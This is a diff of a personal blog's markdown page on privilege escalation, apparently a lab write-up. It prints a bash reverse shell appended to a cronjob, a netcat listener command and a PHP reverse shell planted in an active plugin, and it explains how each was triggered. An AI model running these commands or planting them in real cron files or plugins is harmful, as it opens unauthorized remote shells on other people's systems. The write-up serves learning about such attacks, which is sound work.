fe-moldark/wesleykent-website/privilegeescalation.markdown

 <br><br>
 Back to the reverse shell side of things, let's use the example I mentioned with modifying the file used by the cronjob.
 Essentially I was able to edit in the following command to a cronjob that executed every minute, and what I appended to that file was the following:<br>
 `bash -i >& /dev/tcp/10.18.91.219/8000 0>&1`<br><br>
-While in another tab I had a netcat listener on that same port:<br>
+While in another tab I had a netcat listener on that same port: `nc -lvnp 8000`
-`nc -lvnp 8000`<br><br>
+<br><br>
 Basically what this two step process is saying is:<br>
-- First, upload a reverse shell somehow, that will somehow be called (examples given here were as activated plugins or a cronjob)
+- First, upload a reverse shell somehow, that will somehow be called (examples given here were as activated plugins or by a cronjob)
 - And then second, you need to be listening on the same port that the reverse shell is trying to reach you at.
 When that command executes it will try to initiate that connection over port `8000` at my IP address of `10.18.91.219`.
 If I am not listening over that port I will miss the connection<br><br>

-The other example with the plugin I forget exactly how it was worded, but I do recall I was able to gain a foothold into their website editor and from there I could edit their plugins.
+The other example was with the plugin, and although I forget exactly how it was worded, I do recall I was able to gain a foothold into their website editor and from there I could edit their plugins.
 I edited one of their already active plugins with something like:<br>
 `php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'`<br><br>
 And then curled the location for that specific php plugin, which started the reverse shell, and my netcat listener was already waiting.<br><br>